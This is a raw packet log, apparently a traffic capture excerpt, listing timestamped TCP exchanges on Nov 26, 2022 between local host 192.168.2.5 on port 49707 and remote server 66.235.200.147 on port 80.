Nov 26, 2022 11:17:40.104049921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104070902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104093075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104091883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104115963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104131937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104140997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104161978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104176044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104186058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104207993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104228973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104228973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104252100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104264021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104276896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104299068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104311943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104321957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104341984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104360104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104366064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104384899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104396105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104412079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104430914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104449987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104453087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104474068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104486942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104500055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104520082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104541063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104541063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104563951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104581118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104587078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104610920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104624987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104635000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104656935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104676962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104676962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104701996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104717016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104724884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104747057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104767084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104768991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104792118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104806900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104816914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104842901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104861975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104866982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104895115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104914904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104914904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104938030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104959965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104960918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104984045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105003119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105007887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105029106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105045080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105051994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105072021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105092049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105093002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105114937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105129957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105139017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105158091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105174065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105180979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105201960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105220079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105223894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105247021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105262041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105272055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105292082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105309963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105314016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105334044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105355024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105355024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105376959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105391979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105401039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105421066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105439901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105443954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105464935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105480909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105487108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105509043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105525017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105531931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105556011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105576992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105581045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105603933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105618000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105629921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105652094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105670929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105675936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105695009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105710983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105719090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105741024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105760098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105763912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105784893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105804920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105804920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105828047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105842113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105854034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105874062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105892897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105896950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105917931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105931997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.105943918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105962992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105982065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.105987072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106008053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106023073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106041908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106069088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106086969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106090069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106110096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106122017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106133938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106156111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106168032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106178999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106198072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106214046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106220007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106240988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106255054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106262922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106285095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106300116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106307983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106328011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106340885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106352091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106370926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106385946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106393099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106412888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106430054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106435061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106458902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106471062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106482029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106503010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106517076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106524944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106545925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106559992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106569052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106589079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106604099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106638908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106656075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106676102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106676102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106705904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106722116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106726885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106746912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106761932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106767893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106790066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106802940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106813908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106834888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106848001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106859922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106893063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106904984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106918097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106930017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106944084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106954098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106970072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.106980085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.106996059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107007027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107022047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107031107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107047081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107057095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107072115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107086897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107095003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107111931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107117891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107139111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107142925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107155085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107167959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107184887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107191086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107209921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107214928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107229948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107239962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107251883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107265949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107281923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107287884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107309103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107311964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107325077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107337952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107351065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107362032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107377052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107386112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107403994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107409000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107424021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107434034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107446909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107460976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107474089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107486963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107502937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107523918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107546091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107559919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107567072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107575893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107609987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107614994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107635975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107641935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107659101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107661963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107682943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107686996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107703924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107712984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107729912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107738018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107759953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107763052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107773066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107788086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107800961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107812881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107824087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107840061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107860088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107863903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107887983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107901096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107901096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107919931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107933044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107945919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107955933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107973099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.107984066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.107999086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108020067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108021021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108035088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108047962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108057976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108074903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108084917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108100891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108112097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108128071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108139992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108160973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108174086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108189106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108197927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108216047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108226061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108241081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108256102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108267069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108287096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108292103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108299971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108318090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108329058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108344078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108352900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108370066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108380079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108396053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108407021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108421087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108431101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108448982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108458996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108474970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108485937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108500957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108510971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108525038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108535051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108551025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108561993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108577967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108587027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108606100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108614922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108632088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108643055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108659029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108669043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108685970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108696938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108711958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108724117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108738899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108748913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108764887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108776093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108791113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108803988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108815908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108828068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108843088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108854055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108870029 CET	80	49707	66.235.200.147	192.168.2.5
